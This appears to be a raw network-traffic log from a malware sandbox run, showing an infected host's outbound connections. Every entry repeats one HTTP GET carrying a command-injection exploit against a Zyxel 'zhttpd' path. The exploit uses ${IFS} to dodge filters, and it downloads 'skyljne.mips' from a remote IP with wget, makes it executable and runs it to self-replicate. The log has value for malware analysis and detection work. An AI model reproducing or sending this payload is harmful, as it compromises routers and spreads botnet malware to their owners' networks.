                                                Jan 12, 2024 18:16:35.757113934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7712192.168.2.234782653.236.176.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.757195950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7713192.168.2.2345394217.146.255.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.765957117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7714192.168.2.234339231.5.178.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766012907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7715192.168.2.2348810155.120.194.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766084909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7716192.168.2.234581881.251.216.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766098022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7717192.168.2.235066062.170.165.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766127110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7718192.168.2.2352526216.243.20.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766185045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7719192.168.2.2355620159.50.116.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766239882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7720192.168.2.2344506147.128.23.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766278028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7721192.168.2.2334324182.62.147.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766340971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7722192.168.2.2343856113.213.96.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766366005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7723192.168.2.235345464.222.225.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766408920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7724192.168.2.235405851.231.198.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766450882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7725192.168.2.2340488111.220.25.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766486883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7726192.168.2.2344474122.125.131.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766535997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7727192.168.2.23398964.245.191.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766665936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7728192.168.2.234368059.237.18.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766714096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7729192.168.2.2358942118.199.238.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766813040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7730192.168.2.2352518173.18.42.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766833067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7731192.168.2.235627219.106.209.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766877890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7732192.168.2.2356780206.242.236.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766911030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7733192.168.2.2335078166.47.14.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.766967058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7734192.168.2.234519235.98.94.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767014980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7735192.168.2.2335532198.23.115.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767070055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7736192.168.2.23584505.144.143.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767101049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7737192.168.2.2339292158.196.43.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767153978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7738192.168.2.234029824.202.94.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767189026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7739192.168.2.23472302.162.37.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767231941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7740192.168.2.234504840.168.157.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767288923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7741192.168.2.236091283.196.121.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767322063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7742192.168.2.2352920195.164.15.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767375946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7743192.168.2.2348324106.156.67.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767410994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7744192.168.2.234725885.239.151.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767457962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7745192.168.2.2339264165.177.22.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767498016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7746192.168.2.2351664185.25.97.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767514944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7747192.168.2.2338754150.237.59.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767561913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7748192.168.2.2360482103.58.214.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767638922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7749192.168.2.2345398107.33.53.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767644882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7750192.168.2.2354416192.17.50.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767728090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7751192.168.2.233830647.230.207.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767741919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7752192.168.2.2342804156.111.233.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767781973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7753192.168.2.2347606171.76.173.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767807007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7754192.168.2.235015846.183.198.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767910957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7755192.168.2.235941679.207.225.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767910957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7756192.168.2.2343358129.127.201.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.767961979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7757192.168.2.235697878.207.58.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768007040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7758192.168.2.235826252.202.17.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768050909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7759192.168.2.2339286194.85.114.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768088102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7760192.168.2.2360442171.169.59.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768111944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7761192.168.2.2352270207.29.224.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768162012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7762192.168.2.234395690.170.234.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768254042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7763192.168.2.2360248147.247.121.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768255949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7764192.168.2.234496493.254.223.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768301010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7765192.168.2.233860458.92.64.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768320084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7766192.168.2.2360766135.250.211.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768366098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7767192.168.2.235522092.125.107.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768424034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7768192.168.2.2348334159.0.170.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768440962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7769192.168.2.23454341.198.168.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768501043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7770192.168.2.2356448145.79.218.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768582106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7771192.168.2.2340670117.218.16.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768582106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7772192.168.2.2345468158.2.181.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768644094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7773192.168.2.2343614184.148.190.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768680096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7774192.168.2.2348846104.156.158.110443
                                                TimestampBytes transferredDirectionData
